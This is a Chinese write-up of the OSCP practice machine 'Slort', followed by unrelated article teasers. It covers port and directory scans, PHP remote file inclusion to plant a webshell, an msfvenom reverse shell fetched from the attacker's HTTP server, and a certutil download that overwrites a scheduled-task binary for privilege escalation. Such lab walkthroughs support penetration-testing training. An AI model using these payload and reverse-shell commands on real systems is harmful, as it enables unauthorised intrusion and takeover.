OSCP靶场--Slort
OSCP靶场–Slort
考点(1.php 远程文件包含 2.定时任务提权)
1.nmap扫描
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.178.53 -sV -sC -p- --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-24 04:37 EST
Nmap scan report for 192.168.178.53
Host is up (0.28s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| DNSVersionBindReqTCP, JavaRMI, LPDString, NULL:
|_ Host '192.168.45.179' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.178.53:4443/dashboard/
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.178.53:8080/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=2/24%Time=65D9B8F4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersio
SF:nBindReqTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:LPDString,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Ja
SF:vaRMI,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-02-24T09:40:46
|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.85 seconds2.user priv
2.1 目录扫描
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.178.53:8080/_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/192.168.178.53-8080/-_24-02-24_05-44-47.txtError Log: /root/.dirsearch/logs/errors-24-02-24_05-44-47.logTarget: http://192.168.178.53:8080/[05:44:48] Starting:
[05:44:51] 403 - 1KB - /%C0%AE%C0%AE%C0%AF
[05:44:51] 403 - 1KB - /%3f/
[05:44:52] 403 - 1KB - /%ff
[05:44:59] 403 - 1KB - /.ht_wsr.txt
[05:44:59] 403 - 1KB - /.htaccess.bak1
[05:44:59] 403 - 1KB - /.htaccess.sample
[05:44:59] 403 - 1KB - /.htaccess.save
[05:44:59] 403 - 1KB - /.htaccess.orig
[05:44:59] 403 - 1KB - /.htaccess_extra
[05:44:59] 403 - 1KB - /.htaccess_orig
[05:44:59] 403 - 1KB - /.htaccess_sc
[05:44:59] 403 - 1KB - /.htaccessBAK
[05:44:59] 403 - 1KB - /.htaccessOLD
[05:44:59] 403 - 1KB - /.htaccessOLD2
[05:44:59] 403 - 1KB - /.htm
[05:44:59] 403 - 1KB - /.html
[05:44:59] 403 - 1KB - /.htpasswd_test
[05:44:59] 403 - 1KB - /.htpasswds
[05:44:59] 403 - 1KB - /.httr-oauth
[05:45:17] 403 - 1KB - /Trace.axd::$DATA
[05:45:19] 200 - 782B - /Webalizer/
[05:45:47] 403 - 1KB - /cgi-bin/
[05:45:47] 500 - 1KB - /cgi-bin/printenv.pl
[05:45:52] 301 - 351B - /dashboard -> http://192.168.178.53:8080/dashboard/
[05:45:52] 200 - 6KB - /dashboard/howto.html
[05:45:53] 200 - 31KB - /dashboard/faq.html
[05:45:53] 200 - 78KB - /dashboard/phpinfo.php
[05:45:59] 403 - 1KB - /error/
[05:46:01] 200 - 30KB - /favicon.ico
[05:46:02] 503 - 1KB - /examples
[05:46:02] 503 - 1KB - /examples/
[05:46:02] 503 - 1KB - /examples/servlet/SnoopServlet
[05:46:02] 503 - 1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[05:46:02] 503 - 1KB - /examples/jsp/snp/snoop.jsp
[05:46:02] 503 - 1KB - /examples/servlets/servlet/CookieExample
[05:46:02] 503 - 1KB - /examples/servlets/index.html
[05:46:02] 503 - 1KB - /examples/servlets/servlet/RequestHeaderExample
[05:46:06] 301 - 345B - /img -> http://192.168.178.53:8080/img/
[05:46:07] 302 - 0B - /index.php -> http://192.168.178.53:8080/dashboard/
[05:46:07] 302 - 0B - /index.pHp -> http://192.168.178.53:8080/dashboard/
[05:46:07] 302 - 0B - /index.php/login/ -> http://192.168.178.53:8080/dashboard/
[05:46:07] 302 - 0B - /index.php. -> http://192.168.178.53:8080/dashboard/
[05:46:07] 403 - 1KB - /index.php::$DATA
[05:46:21] 403 - 1KB - /phpmyadmin/ChangeLog
[05:46:21] 403 - 1KB - /phpmyadmin/doc/html/index.html
[05:46:21] 403 - 1KB - /phpmyadmin/docs/html/index.html
[05:46:21] 403 - 1KB - /phpmyadmin/README
[05:46:22] 403 - 1KB - /phpmyadmin
[05:46:24] 403 - 1KB - /phpmyadmin/
[05:46:24] 403 - 1KB - /phpmyadmin/index.php
[05:46:24] 403 - 1KB - /phpmyadmin/phpmyadmin/index.php
[05:46:24] 403 - 1KB - /phpmyadmin/scripts/setup.php
[05:46:31] 403 - 1KB - /server-status/
[05:46:31] 403 - 1KB - /server-status
[05:46:31] 403 - 1KB - /server-info
[05:46:33] 301 - 346B - /site -> http://192.168.178.53:8080/site/
[05:46:34] 301 - 27B - /site/ -> index.php?page=main.php
[05:46:46] 403 - 1KB - /web.config::$DATA
[05:46:46] 403 - 1KB - /webalizer
[05:46:49] 200 - 774B - /xampp/ Task Completed
2.2 发现php LFI漏洞:
包含phpinfo.php文件:
2.3 发现存在php RFI漏洞:
2.4 利用RFI获取webshell:
php正向webshell地址:https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php
2.5 转到交互式shell
##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe##
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80## webshell上传shell443.exe
## 执行shell443.exe##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443## local.txt
c:\Users\rupert\Desktop>type local.txt
type local.txt
345738c06042482d447a067226c9bfa7
local.txt
3.root priv
3.1 winpeas.exe:
##
File: C:\xampp\phpMyAdmin\config.inc.php
3.2 发现定时任务:
3.3 覆盖定时任务二进制文件提权:
##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o TFTP.EXE ##
c:\Backup>certutil -urlcache -split -f http://192.168.45.179/TFTP.EXE##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
4.总结
## 考点:
### 1.远程文件包含
### 2.定时任务提权相关文章:
OSCP靶场--Slort
OSCP靶场–Slort 考点(1.php 远程文件包含 2.定时任务提权) 1.nmap扫描 ┌──(root㉿kali)-[~/Desktop] └─# nmap 192.168.178.53 -sV -sC -p- --min-rate 5000 Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-24 04:37 EST Nmap scan report for 192.168.178.53 …...
大数据职业技术培训包含哪些
技能提升认证考试,旨在通过优化整合涵盖学历教育、职业资格、技术水平和高新技术培训等各种教育培训资源,通过大数据行业政府引导,推进教育培训的社会化,开辟教育培训新途径,围绕大数据技术人才创新能力建设࿰…...
【Java程序设计】【C00313】基于Springboot的物业管理系统(有论文)
基于Springboot的物业管理系统(有论文) 项目简介项目获取开发环境项目技术运行截图 项目简介 这是一个基于Springboot的物业管理系统,本系统有管理员、物业、业主以及维修员四种角色权限; 管理员进入主页面,主要功能包…...
TensorFlow训练大模型做AI绘图,需要多少的GPU算力支撑
TensorFlow训练大模型做AI绘图,需要多少的GPU算力支撑!这个问题就涉及到了资金投资的额度了。众所周知,现在京东里面一个英伟达的显卡,按照RTX3090(24G显存-涡轮风扇)版本报价是7000-7500之间。如果你买一张这样的单卡…...
docker创建mongodb数据库容器
介绍 本文将通过docker创建一个mongodb数据库容器 1. 拉取mongo镜像 docker pull mongo:3.63.6版本是一个稳定的版本,可以选择安装此版本。 2. 创建并启动主数据库 容器数据卷配置 /docker/mongodb/master/data # 数据库数据目录(宿主机&am…...
Python并发编程:多线程-线程理论
一 什么是线程 在传统操作系统中,每个进程有一个地址空间,而且默认就有一个控制线程 线程顾名思义,就是一条流水线工作的过程(流水线的工作需要电源,电源就相当于CPU),而一条流水线必须属于一个…...
自定义Chrome的浏览器开发者工具DevTools界面的字体和样式
Chrome浏览器开发者工具默认的字体太小,想要修改但没有相关设置。 外观——字体可以自定义字体,但大小不可以调整。 github上有人给出了方法 整理为中文教程: 1.打开浏览器开发者工具,点开设置——实验,勾上红框设…...
人事|人事管理系统|基于Springboot的人事管理系统设计与实现(源码+数据库+文档)
人事管理系统目录 目录 基于Springboot的人事管理系统设计与实现 一、前言 二、系统功能设计 三、系统实现 1、管理员登录 2、员工管理 3、公告信息管理 4、公告类型管理 5、培训管理 6、培训类型管理 四、数据库设计 1、实体ER图 五、核心代码 六、论文参考 七、…...
React18源码: Fiber树中的优先级与帧栈模型
优先级{#lanes} 在全局变量中有不少变量都以Lanes命名 如workInProgressRootRenderLanes, subtreeRenderLanes其作用见上文注释它们都与优先级相关 React中有3套优先级体系,并了解了它们之间的关联关系现在来看下fiber树构造过程中,车道模型Lane的具体应…...
)
Hive 最全面试题及答案(基础篇)
基本知识 hive元数据存储 Hive 元数据存储了关于表、分区、列、分桶等信息。 在生产环境中,通常会将 Hive 的元数据存储在外部的关系型数据库中,如 MySQL 或 PostgreSQL。这样可以提供更好的性能、可扩展性和容错性。通过配置 Hive 的元数据存储为 MySQL 或 PostgreSQL,可以…...
【力扣】整数反转,判断是否溢出的数学解法
整数反转原题地址 方法一:数学 反转整数 如何反转一个整数呢?考虑整数操作的3个技巧: xmod10 可以取出 x 的最低位,如 x123 , xmod103 。x/10 可以去掉 x 的最低位,如 x123 , x/10 …...
Jmeter之内置函数__property和__P的区别
1. __property函数 作用 读取 Jmeter 属性 语法格式 ${__property(key,var,default)} 参数讲解 小栗子 ${__property(key)} 读取 key 属性如果找不到 key 属性,则返回 key(属性名) ${__property(key,,default)} 读取 key 属性如果找不到 k…...
GPT润色指令
1. GPT润色指令 Below is a paragraph from an academic paper. Polish the writing to meet the academic style,improve the spelling, grammar, clarity, concision and overall readability. When necessary, rewrite the whole sentence. Paragraph :你的句子…...
Ubuntu中matplotlib显示中文的方法
其实有很多朋友已经总结得很好了:Ubuntu下让matplotlib显示中文字体_ubuntu matplot 使用汉字-CSDN博客 这里我就是简单补充一下: 按照上面这篇博客,下载:GitHub - tracyone/program_font: fonts for programmer 然后运行&#…...
-StringBuilder-StringJoiner-打乱字符串)
String类-equals和==的区别-遍历-SubString()-StringBuilder-StringJoiner-打乱字符串
概述 String 类代表字符串,Java 程序中的所有字符串文字(例如“abc”)都被实现为此类的实例。也就是说,Java 程序中所有的双引号字符串,都是 String 类的对象。String 类在 java.lang 包下,所以使用的时候…...
IDEA的LeetCode插件的设置
一、下载插件 选择点击File->Setting->Plugins:搜索LeetCode 二、打开这个插件 选择View —>Tool Windows—>leetcode 三、登陆自己的账号 关于下面几个参数的定义,官方给的是: Custom code template: 开启使用自定义模板&…...
2024.2.29 模拟实现 RabbitMQ —— 项目展示
目录 项目介绍 核心功能 核心技术 演示直接交换机 演示扇出交换机 演示主题交换机 项目介绍 此处我们模拟 RabbitMQ 实现了一个消息队列服务器 核心功能 提供了 虚拟主机、交换机、队列、绑定、消息 概念的管理九大核心 API 创建队列、销毁队列、创建交换机、销毁交换机、…...
React htmlfor
注意,在添加属性时, class 属性需要写成 className ,for 属性需要写成 htmlFor ,这是因为 class 和 for 是 JavaScript 的保留字。 在React中,当我们需要为一个表单元素设置标签时,可以使用htmlFor属性。它…...
现代化数据架构升级:毫末智行自动驾驶如何应对年增20PB的数据规模挑战?
毫末智行是一家致力于自动驾驶的人工智能技术公司,其前身是长城汽车智能驾驶前瞻分部,以零事故、零拥堵、自由出行和高效物流为目标,助力合作伙伴重塑和全面升级整个社会的出行及物流方式。 在自动驾驶领域中,是什么原因让毫末智行…...
理解Stable Diffusion、LoRA、Dreambooth、Hypernetworks、Textual Inversion、Checkpoint
前言 在深度学习和人工智能的领域中,模型生成和调整技术的快速发展为创造性内容的自动化提供了新的可能性。本文将介绍四种重要的模型技术——Stable Diffusion、LoRA、Dreambooth、和Hypernetworks——它们在生成艺术、个性化模型调整和网络结构设计方面各自的特点…...
Linux链表操作全解析
Linux C语言链表深度解析与实战技巧 一、链表基础概念与内核链表优势1.1 为什么使用链表?1.2 Linux 内核链表与用户态链表的区别 二、内核链表结构与宏解析常用宏/函数 三、内核链表的优点四、用户态链表示例五、双向循环链表在内核中的实现优势5.1 插入效率5.2 安全…...
python打卡day49
知识点回顾: 通道注意力模块复习空间注意力模块CBAM的定义 作业:尝试对今天的模型检查参数数目,并用tensorboard查看训练过程 import torch import torch.nn as nn# 定义通道注意力 class ChannelAttention(nn.Module):def __init__(self,…...
黑马Mybatis
Mybatis 表现层:页面展示 业务层:逻辑处理 持久层:持久数据化保存 在这里插入图片描述 Mybatis快速入门 
使用分级同态加密防御梯度泄漏
抽象 联邦学习 (FL) 支持跨分布式客户端进行协作模型训练,而无需共享原始数据,这使其成为在互联和自动驾驶汽车 (CAV) 等领域保护隐私的机器学习的一种很有前途的方法。然而,最近的研究表明&…...
转转集团旗下首家二手多品类循环仓店“超级转转”开业
6月9日,国内领先的循环经济企业转转集团旗下首家二手多品类循环仓店“超级转转”正式开业。 转转集团创始人兼CEO黄炜、转转循环时尚发起人朱珠、转转集团COO兼红布林CEO胡伟琨、王府井集团副总裁祝捷等出席了开业剪彩仪式。 据「TMT星球」了解,“超级…...
【SQL学习笔记1】增删改查+多表连接全解析(内附SQL免费在线练习工具)
可以使用Sqliteviz这个网站免费编写sql语句,它能够让用户直接在浏览器内练习SQL的语法,不需要安装任何软件。 链接如下: sqliteviz 注意: 在转写SQL语法时,关键字之间有一个特定的顺序,这个顺序会影响到…...
相机从app启动流程
一、流程框架图 二、具体流程分析 1、得到cameralist和对应的静态信息 目录如下: 重点代码分析: 启动相机前,先要通过getCameraIdList获取camera的个数以及id,然后可以通过getCameraCharacteristics获取对应id camera的capabilities(静态信息)进行一些openCamera前的…...
多种风格导航菜单 HTML 实现(附源码)
下面我将为您展示 6 种不同风格的导航菜单实现,每种都包含完整 HTML、CSS 和 JavaScript 代码。 1. 简约水平导航栏 <!DOCTYPE html> <html lang"zh-CN"> <head><meta charset"UTF-8"><meta name"viewport&qu…...
3-11单元格区域边界定位(End属性)学习笔记
返回一个Range 对象,只读。该对象代表包含源区域的区域上端下端左端右端的最后一个单元格。等同于按键 End 向上键(End(xlUp))、End向下键(End(xlDown))、End向左键(End(xlToLeft)End向右键(End(xlToRight)) 注意:它移动的位置必须是相连的有内容的单元格…...
HashMap中的put方法执行流程(流程图)
1 put操作整体流程 HashMap 的 put 操作是其最核心的功能之一。在 JDK 1.8 及以后版本中,其主要逻辑封装在 putVal 这个内部方法中。整个过程大致如下: 初始判断与哈希计算: 首先,putVal 方法会检查当前的 table(也就…...